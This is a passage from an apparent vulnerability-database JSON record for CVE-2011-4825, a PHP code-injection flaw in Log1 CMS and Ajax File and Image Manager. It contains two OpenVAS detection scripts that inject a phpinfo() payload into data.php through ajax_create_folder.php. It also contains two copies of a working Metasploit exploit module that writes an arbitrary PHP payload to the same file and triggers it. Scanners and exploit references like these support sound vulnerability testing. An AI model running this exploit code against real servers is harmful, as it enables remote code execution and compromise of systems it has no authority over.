value:\"http://www.phpletter.com/\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 12:01:47 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-07 07:36:01 +0100 (Mon, 07 Nov 2011)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"summary\", value:\"Ajax File and Image Manager is prone to a remote PHP code-injection\n vulnerability.\");\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to inject and execute arbitrary PHP\n code in the context of the affected application. This may facilitate a\n compromise of the application and the underlying system. Other attacks\n are also possible.\");\n script_tag(name:\"affected\", value:\"Ajax File and Image Manager 1.0 is vulnerable. Other versions may also\n be affected.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!can_host_php(port:port))exit(0);\n\nhost = http_host_name( port:port );\n\nex = string(\"bla=1&blub=2&foo=<?php phpinfo(); ?>\");\n\nforeach dir( make_list_unique( \"/fm\", \"/file\", \"/filemanager\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n\n filename = string(dir,\"/ajaxfilemanager/ajax_create_folder.php\");\n\n req = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Accept-Encoding: identity\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(ex),\n \"\\r\\n\\r\\n\",\n ex);\n\n result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\n if(result =~ \"HTTP/1.. 200\") {\n\n url = string(dir, \"/ajaxfilemanager/inc/data.php\");\n req = http_get(item:url, port:port);\n\n result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\n if(\"<title>phpinfo()\" >< result) {\n\n # clean the data.php on success by sending empty POST...\n ex = string(\"\");\n\n req = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Accept-Encoding: identity\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(ex),\n \"\\r\\n\\r\\n\",\n ex);\n\n result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\n security_message(port:port);\n exit(0);\n\n }\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-11T15:07:55", "bulletinFamily": "scanner", "description": "Log1 CMS is prone to a remote PHP code-injection vulnerability.", "modified": "2019-11-08T00:00:00", "published": "2012-06-18T00:00:00", "id": "OPENVAS:1361412562310103496", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103496", "title": "Log1 CMS 'data.php' PHP Code Injection Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Log1 CMS 'data.php' PHP Code Injection Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103496\");\n script_cve_id(\"CVE-2011-4825\");\n script_bugtraq_id(50523);\n script_version(\"2019-11-08T10:10:55+0000\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Log1 CMS 'data.php' PHP Code Injection Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/50523\");\n script_tag(name:\"last_modification\", value:\"2019-11-08 10:10:55 +0000 (Fri, 08 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-06-18 17:36:01 +0100 (Mon, 18 Jun 2012)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name:\"summary\", value:\"Log1 CMS is prone to a remote PHP code-injection vulnerability.\");\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to inject and execute arbitrary PHP\n code in the context of the affected application. This may facilitate a\n compromise of the application and the underlying system, other attacks\n are also possible.\");\n script_tag(name:\"affected\", value:\"Log1 CMS 2.0 is vulnerable, other versions may also be affected.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\nLikely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port( default:80 );\nif( ! can_host_php( port:port ) ) exit( 0 );\n\nhost = http_host_name( port:port );\nex = string(\"bla=1&blub=2&foo=<?php phpinfo(); ?>\");\n\nforeach dir( make_list_unique( \"/cms\", cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n filename = dir + \"/admin/libraries/ajaxfilemanager/ajax_create_folder.php\";\n\n req = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Accept-Encoding: identity\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(ex),\n \"\\r\\n\\r\\n\",\n ex);\n result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\n if(result =~ \"HTTP/1.. 200\") {\n\n url = dir + \"/admin/libraries/ajaxfilemanager/inc/data.php\";\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( \"<title>phpinfo()\" >< res ) {\n\n # clean the data.php on success by sending empty POST...\n ex = string(\"\");\n\n req = string(\"POST \", filename, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Accept-Encoding: identity\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(ex),\n \"\\r\\n\\r\\n\",\n ex);\n http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n report = report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:36", "bulletinFamily": "exploit", "description": "", "modified": "2012-06-03T00:00:00", "published": "2012-06-03T00:00:00", "href": "https://packetstormsecurity.com/files/113226/Log1-CMS-writeInfo-PHP-Code-Injection.html", "id": "PACKETSTORM:113226", "title": "Log1 CMS writeInfo() PHP Code Injection", "type": "packetstorm", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Log1 CMS writeInfo() PHP Code Injection\", \n'Description' => %q{ \nThis module exploits the \"Ajax File and Image Manager\" component that can be \nfound in log1 CMS. In function.base.php of this component, the 'data' parameter \nin writeInfo() allows any malicious user to have direct control of writing data \nto file data.php, which results in arbitrary remote code execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'EgiX', #Found the bug in ajax_create_folder.php \n'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php \n'sinn3r' #Metasploit \n], \n'References' => \n[ \n['CVE', '2011-4825'], \n['OSVDB', '76928'], \n['EDB', '18075'], #Egix's advisory \n['EDB', '18151'] #Adel's \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\" \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"none\" \n}, \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n['log1 CMS 2.0', {}], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Apr 11 2011\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to log1 CMS', '/log1cms2.0/']) \n], self.class) \nend \n \n \ndef check \nuri = target_uri.path \nuri << '/' if uri[-1, 1] != '/' \n \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => \"#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php\" \n}) \n \nif res and res.code == 200 \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \n \ndef exploit \nuri = target_uri.path \nuri << '/' if uri[-1, 1] != '/' \n \npeer = \"#{rhost}:#{rport}\" \nphp = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>| \n \nprint_status(\"#{peer} - Sending PHP payload (#{php.length.to_s} bytes)\") \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => \"#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php\", \n'data' => php \n}) \n \nprint_status(\"#{peer} - Requesting data.php\") \nsend_request_raw({ \n'method' => 'GET', \n'uri' => \"#{uri}admin/libraries/ajaxfilemanager/inc/data.php\" \n}) \n \nhandler \nend \nend`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113226/log1cms_ajax_create_folder.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2019-11-24T20:53:49", "bulletinFamily": "exploit", "description": "This module exploits the \"Ajax File and Image Manager\" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution.\n", "modified": "2017-07-24T13:26:21", "published": "2012-06-02T06:51:20", "id": "MSF:EXPLOIT/MULTI/HTTP/LOG1CMS_AJAX_CREATE_FOLDER", "href": "", "type": "metasploit", "title": "Log1 CMS writeInfo() PHP Code Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Log1 CMS writeInfo() PHP Code Injection\",\n 'Description' => %q{\n This module exploits the \"Ajax File and Image Manager\" component that can be\n found in log1 CMS. In function.base.php of this component, the 'data' parameter\n in writeInfo() allows any malicious user to have direct control of writing data\n to file data.php, which results in arbitrary remote code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'EgiX', #Found the bug in ajax_create_folder.php\n 'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['CVE', '2011-4825'],\n ['OSVDB', '76928'],\n ['EDB', '18075'], #Egix's advisory\n ['EDB', '18151'] #Adel's\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['log1 CMS 2.0', {}],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Apr 11 2011\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to log1 CMS', '/log1cms2.0/'])\n ])\n end\n\n\n def check\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, \"admin/libraries/ajaxfilemanager/ajax_create_folder.php\")\n })\n\n if res and res.code == 200\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n\n def exploit\n uri = normalize_uri(target_uri.path)\n uri << '/' if uri[-1, 1] != '/'\n\n peer = \"#{rhost}:#{rport}\"\n php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>|\n\n print_status(\"Sending PHP payload (#{php.length.to_s} bytes)\")\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, \"admin/libraries/ajaxfilemanager/ajax_create_folder.php\"),\n 'data' => php\n })\n\n print_status(\"Requesting data.php\")\n send_request_raw({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php')\n })\n\n handler\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/log1cms_ajax_create_folder.rb"}]}
